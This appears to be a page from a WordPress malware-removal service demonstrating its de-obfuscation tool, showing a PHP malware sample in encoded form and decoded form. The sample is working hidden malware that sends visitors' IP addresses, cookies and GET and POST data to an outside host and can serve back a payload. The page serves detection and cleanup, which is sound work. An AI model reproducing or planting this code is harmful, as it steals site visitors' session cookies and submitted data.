De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php if (isset($_COOKIE)) { if (strpos($_SERVER["\x48\124\124\120\x5f\x55\x53\x45\x52\137\101\107\105\116\x54"], "\x43\150\162\x6f\155\145") !== false) { if (preg_match("\57\x21\133\101\x2d\106\x30\55\71\135\x7b\61\x30\x7d\x21\x2f", "\41" . implode("\x21", array_keys($_COOKIE)) . "\41")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\160\x73\72\x2f\57\x67\162\x61\156\x2d\144\x69\156\x65\162\x6f\56\x66\141\x6e\163\x2f\151\x6e\144\x65\170\x2e\160\x68\160"); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array("\x69" => serialize($_SERVER["\x52\x45\115\117\124\x45\137\x41\104\x44\x52"]), "\165" => serialize($_SERVER["\110\x54\x54\x50\x5f\x55\123\105\122\137\101\x47\x45\x4e\x54"]), "\x68" => serialize($_SERVER["\x48\x54\x54\x50\x5f\110\117\x53\124"]), "\x63" => serialize($_COOKIE), "\x67" => serialize($_GET), "\x70" => serialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if (strpos($r, "\x47\111\x46\x38\71") !== false) { header("\x43\x6f\156\x74\145\156\164\55\124\x79\x70\x65\72\40\151\x6d\141\x67\x65\57\x67\x69\x66"); echo $r; die; } } } } ?>
<?php if (isset($_COOKIE)) { if (strpos($_SERVER["HTTP_USER_AGENT"], "Chrome") !== false) { if (preg_match("/![A-F0-9]{10}!/", "!" . implode("!", array_keys($_COOKIE)) . "!")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://gran-dinero.fans/index.php"); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array("i" => serialize($_SERVER["REMOTE_ADDR"]), "u" => serialize($_SERVER["HTTP_USER_AGENT"]), "h" => serialize($_SERVER["HTTP_HOST"]), "c" => serialize($_COOKIE), "g" => serialize($_GET), "p" => serialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if (strpos($r, "GIF89") !== false) { header("Content-Type: image/gif"); echo $r; die; } } } }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.